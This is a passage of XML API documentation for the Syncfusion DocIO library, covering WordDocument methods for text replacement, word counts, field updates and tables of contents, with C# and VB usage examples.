                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(new Regex("Giant panda"), selection, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(New Regex("Giant panda"), selection, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">if it specifies whole word, set to <c>true</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>..</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, True, False, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace(new Regex("Giant panda"), bodyPart);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace(New Regex("Giant panda"), bodyPart)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="saveFormating">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace(new Regex("Giant panda"), bodyPart, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace(New Regex("Giant panda"), bodyPart, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with another Word document, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, true, false);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, True, False)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with another Word document, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, true, false, true);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace("Giant panda", replaceDocument, True, False, True)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            another word document along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Load the another existing Word document to replace
                WordDocument replaceDocument = new WordDocument("Replace.docx");
                //Replace all occurrence of a particular regular expression with the another document
                document.Replace(new Regex("Giant panda"), replaceDocument, true);            
                //Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx);
                replaceDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Load the another existing Word document to replace
                Dim replaceDocument As New WordDocument("Replace.docx")
                'Replace all occurrence of a particular regular expression with the another document
                document.Replace(New Regex("Giant panda"), replaceDocument, True)
                'Save and Close the documents
                document.Save("Sample.docx", FormatType.Docx)
                replaceDocument.Close();
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateWordCount">
            <summary>
            Update Paragraphs count, Word count and Character count in the document
            </summary>
            <remarks>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update Paragraphs count, Word count and Character count in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the Paragraphs count, Word count and Character count in the document
                document.UpdateWordCount();
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the Paragraphs count, Word count and Character count in the document.
                document.UpdateWordCount()
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateWordCount(System.Boolean)">
            <summary>
            Updates Paragraphs count, Word count and Character count. Updates page count if performLayout set to true using Doc to PDF layouting engine.
            </summary>
            <param name="performRelayout">Set to <b>true</b> to update the page count of the document using Word to PDF layouting engine; otherwise, <b>false</b>. The default is <b>false</b>.</param>
            <remarks>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update Page count, Paragraphs count, Word count and Character count in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the Page count, Paragraphs count, Word count and Character count in the document
                document.UpdateWordCount(true);
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the Page count, Paragraphs count, Word count and Character count in the document.
                document.UpdateWordCount(True)
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateDocumentFields">
            <summary>
            Updates fields present in the document.
            </summary>
            <remarks>
            <para>Updating of NUMPAGES field and Cross Reference field with Page number and Paragraph number options are not supported in Silverlight, WinRT, Universal, Windows Phone and Xamarin platforms.</para>
            <para>Currently group shapes, drawing canvas, and table auto resizing are not supported in Word to PDF lay outing, and this may lead to update incorrect page number and total number of pages.</para>
            <para>While updating NUMPAGES field and Cross Reference field with Page number and Paragraph number options uses makes use of our Word to PDF layouting engine which may lead to take some considerable amount of performance to update the above mentioned fields.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update the fields present in Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Input.docx", FormatType.Docx);
                //Updates the fields present in a document.
                document.UpdateDocumentFields();
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Input.docx", FormatType.Docx)
                'Updates the fields present in a document.
                document.UpdateDocumentFields()
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateAlternateChunks">
            <summary>
            Updates the Alternate chunks present in the Word document
            </summary>
            <example>
            <para>The following code example demonstrates how to update the Alternate chunks present in Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Input.docx", FormatType.Docx);
                //Updates the Alternate chunks present in a document.
                document.UpdateAlternateChunks();
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Input.docx", FormatType.Docx)
                'Updates the Alternate chunks present in a document.
                document.UpdateAlternateChunks()
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdatePageRefFields(System.Collections.Generic.List{Syncfusion.DocIO.DLS.WField},System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32})">
            <summary>
            Updates the bookmark page cross reference fields.
            </summary>
            <param name="pagerefFields">The pageref fields.</param>
            <param name="layouter">The layouter.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateRefFields(System.Collections.Generic.List{Syncfusion.DocIO.DLS.WField})">
            <summary>
            Updates the bookmark cross reference fields.
            </summary>
            <param name="refFields">The reference fields.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateListValue(Syncfusion.DocIO.DLS.WTextBody,System.Int32,System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the list value.
            </summary>
            <param name="textbody">The textbody.</param>
            <param name="index">The index.</param>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateHeaderFooterListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the header footer list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateShapeListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the shape list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateEndNoteListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the end note list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateFootNoteListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the foot note list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateCommentListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the comment list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateSectionListValues(System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String}[],System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32}[])">
            <summary>
            Updates the section list values.
            </summary>
            <param name="listValueCollections">The list value collections.</param>
            <param name="levelNumberCollections">The level number collections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetParagraphNumber(Syncfusion.DocIO.DLS.WField,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WListLevel,System.String,Syncfusion.DocIO.ReferenceKind,System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.String},System.Collections.Generic.Dictionary{Syncfusion.DocIO.DLS.Entity,System.Int32})">
            <summary>
            Gets the paragraph number.
            </summary>
            <param name="refFields">The reference fields.</param>
            <param name="bkStart">The bk start.</param>
            <param name="ownerPara">The owner para.</param>
            <param name="level">The level.</param>
            <param name="separator">The separator.</param>
            <param name="referencekind">The referencekind.</param>
            <param name="paragraphListValue">The paragraph list value.</param>
            <param name="paragraphLevelNumbers">The paragraph level numbers.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetEntityOwnerTextBody(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the entity owner text body.
            </summary>
            <param name="para">The para.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.IsContainNumPagesField(System.Collections.Generic.List{Syncfusion.DocIO.DLS.WField},System.Collections.Generic.List{Syncfusion.DocIO.DLS.WField})">
            <summary>
            Checking for NumPages/PageRef/Ref field present in the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CalculateForTextBody(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            check all text body items
            </summary>
            <param name="bodyItems"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CalculateForTabls(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Check all cell in table
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CalculateForParagraphs(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Calculate paragraphs count, word count and character count
            </summary>
            <param name="para"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateTableOfContents">
            <summary>
            Update Table of contents in the document.
            </summary>
            <remarks>
            <para>Updating TOC makes use of our Word to PDF layouting engine which may lead to the updation of incorrect page number due to its limitations. Also use of WOrd to PDF layout engine may lead to take some considerable amount of performance to update the page numbers.</para>
            <para>This method is not supported in Silverlight, WinRT, Universal, Universal Windows Platform, MVC6, Xamarin and windows phone platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to update a TOC in an existing word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input word template
                WordDocument document = new WordDocument(@�Template.docx�);
                //Update the table of contents.
                document.UpdateTableOfContents();
                //Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input word template
                Dim document As New WordDocument("Template.docx")
                'Update the table of contents.
                document.UpdateTableOfContents()
                �Save and close the Word document instance.
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateListValue(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Updates the list.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ClearLists">
            <summary>
            Clears the list collection.
            </summary>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.EnsureLevelRestart(Syncfusion.DocIO.DLS.WListFormat,System.String,System.Boolean,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Ensures the level restart.
            </summary>
            <param name="format">The format.</param>
            <param name="styleName">Name of the style.</param>
            <param name="fullRestart">if set to <c>true</c> full restart is performed.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetListItemIndex(Syncfusion.DocIO.DLS.WListFormat,System.String,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Gets the list item index value.
            </summary>
            <param name="format">The List format</param>
            <param name="styleName">Name of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetListStartValue(Syncfusion.DocIO.DLS.WListFormat,System.String,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Gets the list start value.
            </summary>
            <param name="format">The format.</param>
            <param name="styleName">Name of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetListValue(Syncfusion.DocIO.DLS.WListFormat,System.String,Syncfusion.DocIO.DLS.WListLevel,System.Int32,System.Int32)">
            <summary>
            Gets the list value.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="styleName">Name of the style.</param>
            <param name="level">The level.</param>
            <param name="startAt">The start at.</param>
            <param name="listItemIndex">Index of the list item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetListPrefixByItsLevel(System.Int32,System.String)">
            <summary>
            Gets the list prefix string, based on list level number
            </summary>
            <param name="levelNo">Current list level number</param>
            <param name="listPrefix">List format entire prefix string</param>
            <returns>currentListLevelPrefix value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetNumberedListValue(Syncfusion.DocIO.DLS.WListLevel,System.Int32,System.Boolean,System.String)">
            <summary>
            Gets the list start value.
            </summary>
            <param name="tempLevel">The level.</param>
            <param name="num">list value.</param>
            <param name="value">value.</param>
            <param name="listItemIndex">Index of the list item.</param>
            <param name="listPrefix">List prefix text value</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SortKeys(System.Int32[])">
            <summary>
            Sort the Keys
            </summary>
            <param name="keys">keys</param>
            <returns> returns keys value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraphs in the document with replace string, taking into
            consideration of case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with simple text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine("First paragraph Second paragraph", "Replaced paragraph", true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine("First paragraph Second paragraph", "Replaced paragraph", True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of the specified pattern text, which is extended to several paragraph, with replace text.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with simple text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), "Replaced paragraph");
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Replace the text extended to two paragraphs with simple text
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), "Replaced paragraph")
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraph in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
